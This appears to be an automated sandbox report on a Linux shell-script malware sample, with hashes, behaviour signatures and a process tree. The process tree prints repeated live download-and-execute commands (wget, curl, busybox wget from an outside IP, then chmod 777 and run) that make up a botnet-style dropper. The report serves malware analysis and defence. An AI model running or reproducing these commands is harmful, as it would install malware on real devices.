Analysis
-
max time kernel
92s -
max time network
90s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
24/11/2024, 01:07
Static task
static1
Behavioral task
behavioral1
Sample
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh
-
Size
10KB
-
MD5
26f371cd3359d8f6a45ccc544288c804
-
SHA1
35bd60ad220991f844f9862e522418bc05563390
-
SHA256
d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce
-
SHA512
2729bf8db10105d916290630952e3067a9f8f09aa7ae41abbe4ba4b44d26b55872829cbe0a605d526abae197a6dafb93ee254f30ac20bf7ce04bea8b41cb3ef0
-
SSDEEP
192:k47/XwgW6ozLldOY4Z6zJnzLldOYZM7/Xwg+w:kN5zLlcY4Z6zJnzLlcY3w
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 901 chmod 919 chmod 802 chmod 859 chmod 865 chmod 871 chmod 877 chmod 943 chmod 949 chmod 733 chmod 786 chmod 895 chmod 739 chmod 883 chmod 937 chmod 853 chmod 907 chmod 967 chmod 757 chmod 809 chmod 889 chmod 913 chmod 931 chmod 847 chmod 925 chmod 955 chmod 961 chmod 973 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy 734 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 740 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat 758 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c 788 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E 803 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y 812 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT 848 Lo46YywIia327erXTugKxcchWtLwMJPGmT /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 854 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB 860 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR 866 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 872 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey 878 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O 884 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 890 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E 896 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y 902 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT 908 Lo46YywIia327erXTugKxcchWtLwMJPGmT /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 914 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c 920 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR 926 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 932 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB 938 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O 944 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 950 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey 956 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 962 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat 968 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy 974 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 curl File opened for modification /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey curl File opened for modification /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT curl File opened for modification /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat curl File opened for modification /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB curl File opened for modification /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB curl File opened for modification /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 curl File opened for modification /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 curl File opened for modification /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y curl File opened for modification /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 curl File opened for modification /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat curl File opened for modification /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E curl File opened for modification /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 curl File opened for modification /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O curl File opened for modification /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey curl File opened for modification /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy curl File opened for modification /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy curl File opened for modification /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 curl File opened for modification /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT curl File opened for modification /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 curl File opened for modification /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O curl File opened for modification /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c curl File opened for modification /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y curl File opened for modification /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 curl File opened for modification /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c curl File opened for modification /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR curl File opened for modification /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR curl File opened for modification /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E curl
Processes
-
/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh1⤵PID:702
-
/bin/rm/bin/rm bins.sh2⤵PID:705
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:710
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:725
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:731
-
-
/bin/chmodchmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:735
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:736
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:738
-
-
/bin/chmodchmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:741
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:742
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:752
-
-
/bin/chmodchmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Executes dropped EXE
PID:758
-
-
/bin/rmrm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:761
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:762
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:771
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:779
-
-
/bin/chmodchmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:791
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:793
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:801
-
-
/bin/chmodchmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Executes dropped EXE
PID:803
-
-
/bin/rmrm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:804
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:805
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:807
-
-
/bin/chmodchmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:813
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:814
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:846
-
-
/bin/chmodchmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT./Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:849
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:850
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:852
-
-
/bin/chmodchmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:855
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:856
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:858
-
-
/bin/chmodchmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:861
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:862
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:864
-
-
/bin/chmodchmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:867
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:868
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:870
-
-
/bin/chmodchmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:873
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:874
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:876
-
-
/bin/chmodchmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:879
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:880
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:882
-
-
/bin/chmodchmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:885
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:886
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:888
-
-
/bin/chmodchmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:891
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:892
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:894
-
-
/bin/chmodchmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E2⤵PID:897
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:898
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:900
-
-
/bin/chmodchmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y2⤵PID:903
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:904
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:906
-
-
/bin/chmodchmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT./Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm Lo46YywIia327erXTugKxcchWtLwMJPGmT2⤵PID:909
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:910
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:912
-
-
/bin/chmodchmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV02⤵PID:915
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:916
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:918
-
-
/bin/chmodchmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c2⤵PID:921
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:922
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:924
-
-
/bin/chmodchmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR2⤵PID:927
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:928
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:930
-
-
/bin/chmodchmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF52⤵PID:933
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:934
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
